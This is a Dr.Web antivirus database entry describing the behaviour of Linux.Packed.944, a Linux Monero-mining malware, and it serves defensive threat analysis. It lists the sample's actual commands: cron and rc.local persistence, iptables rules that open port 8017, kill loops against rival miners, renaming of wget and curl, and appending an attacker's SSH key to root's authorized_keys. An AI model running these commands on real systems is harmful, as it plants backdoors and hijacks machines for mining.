Um eine korrekte Funktionsweise unserer Website zu gewährleisten, müssen Sie die Unterstützung für JavaScript in Ihrem Browser aktivieren.
Linux.Packed.944
Added to the Dr.Web virus database:
2020-10-05
Virus description added:
2020-10-05
Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
/etc/rc.local
/etc/crontab
/var/spool/cron/crontabs/root
Malicious functions:
Launches itself as a daemon
Gets access to SSH keys
/root/.ssh/authorized_keys
Modifies firewall settings:
iptables -I INPUT -p tcp --dport 8017 -j ACCEPT
iptables -I OUTPUT -p tcp --sport 8017 -j ACCEPT
iptables -I PREROUTING -t nat -p tcp --dport 8017 -j ACCEPT
Launches processes:
<SAMPLE_FULL_PATH> -deamon
sh -c ps -ef | grep Circle_MI | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef
grep -v grep
grep Circle_MI
awk {print $2}
xargs kill -9
kill -9
sh -c ps -ef | grep kworker34 | grep -v grep | awk '{print $2}' | xargs kill -9
grep kworker34
sh -c ps -ef | grep .daemond | grep -v grep | awk '{print $2}' | xargs kill -9
grep .daemond
sh -c ps -ef | grep /tmp/thisxxs | grep -v grep | awk '{print $2}' | xargs kill -9
grep /tmp/thisxxs
sh -c ps -ef | grep /opt/yilu/work/xig/xig | grep -v grep | awk '{print $2}' | xargs kill -9
grep /opt/yilu/work/xig/xig
sh -c ps -ef | grep /opt/yilu/mservice | grep -v grep | awk '{print $2}' | xargs kill -9
grep /opt/yilu/mservice
sh -c ps -ef | grep /usr/bin/.sshd | grep -v grep | awk '{print $2}' | xargs kill -9
grep /usr/bin/.sshd
sh -c ps -ef | grep /usr/bin/bsd-port/getty | grep -v grep | awk '{print $2}' | xargs kill -9
grep /usr/bin/bsd-port/getty
sh -c ps -ef | grep x86_ | grep -v grep | awk '{print $2}' | xargs kill -9
grep x86_
sh -c ps -ef | grep cryptonight | grep -v grep | awk '{print $2}' | xargs kill -9
grep cryptonight
sh -c ps -ef | grep ddg | grep -v grep | awk '{print $2}' | xargs kill -9
grep ddg
sh -c ps -ef | grep prohash | grep -v grep | awk '{print $2}' | xargs kill -9
grep prohash
sh -c ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
grep monero
sh -c ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
grep xmr
sh -c ps -ef | grep miner | grep -v grep | awk '{print $2}' | xargs kill -9
grep miner
sh -c ps -ef | grep pool. | grep -v grep | awk '{print $2}' | xargs kill -9
grep pool.
sh -c ps -ef | grep tcp: | grep -v grep | awk '{print $2}' | xargs kill -9
grep tcp:
sh -c ps -ef | grep stratum | grep -v grep | awk '{print $2}' | xargs kill -9
grep stratum
sh -c killall xmr
sh -c mv /usr/bin/wget /usr/bin/wget1&
mv /usr/bin/wget /usr/bin/wget1
sh -c mv /usr/bin/curl /usr/bin/curl1&
mv /usr/bin/curl /usr/bin/curl1
sh -c chmod +x /tmp/xmr
chmod +x /tmp/xmr
sh -c /tmp/xmr
/tmp/xmr
sh -c chmod +x /tmp/secure.sh
chmod +x /tmp/secure.sh
sh -c /tmp/secure.sh&
/tmp/secure.sh
sh -c chmod +x /tmp/auth.sh
chmod +x /tmp/auth.sh
sh -c /tmp/auth.sh&
date +%b %e %H
/tmp/auth.sh
sh -c mkdir -p /usr/.work
grep Oct 5 17 /var/log/secure
grep Failed
sort
awk {print $(NF-3)}
uniq -c
awk $1>\"$LIMIT\"{print $1\":\"$2}
mkdir -p /usr/.work
sh -c \cp -R /root/* /usr/.work/ &
sleep 60
grep Oct 5 17 /var/log/auth.log
sh -c mkdir -p /root/.ssh
cp -R <SAMPLE_FULL_PATH> /root/run.sh /root/stdout.log /usr/.work/
mkdir -p /root/.ssh
sh -c chmod 700 /root/.ssh/
chmod 700 /root/.ssh/
sh -c echo >> /root/.ssh/authorized_keys
sh -c chmod 600 /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
sh -c echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7 root@u911\" >> /root/.ssh/authorized_keys
sh -c iptables -I INPUT -p tcp --dport 8017 -j ACCEPT
sh -c iptables -I OUTPUT -p tcp --sport 8017 -j ACCEPT
sh -c iptables -I PREROUTING -t nat -p tcp --dport 8017 -j ACCEPT
Attempts to kill the following processes:
Performs operations with the file system:
Modifies file access rights:
/tmp/xmr
/tmp/secure.sh
/tmp/auth.sh
/root/.ssh
/root/.ssh/authorized_keys
Creates folders:
Creates or modifies files:
/tmp/config.json
/tmp/xmr
/usr/bin/wget
/tmp/secure.sh
/tmp/auth.sh
/usr/.work/<SAMPLE>
/usr/.work/run.sh
/usr/.work/stdout.log
Network activity:
Awaits incoming connections on ports:
Establishes connection:
<LOCAL_DNS_SERVER>
16#.###.226.137:6666
DNS ASK:
Sends data to the following servers:
Receives data from the following servers:
Other:
Collects CPU information
Collects RAM information
Collects information about network activity
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
Laden Sie Dr.Web für Android herunter
Kostenlos für 3 Monate
Alle Schutzkomponenten
Verlängerung der Testversion über AppGallery/Google Pay
Wenn Sie diese Webseite weiter benutzen, bedeutet dies, dass Sie mit der Verarbeitung von Cookies sowie dem Einsatz anderer Technologien zur Sammlung von statistischen Nutzerdaten einverstanden sind. Mehr dazu
OK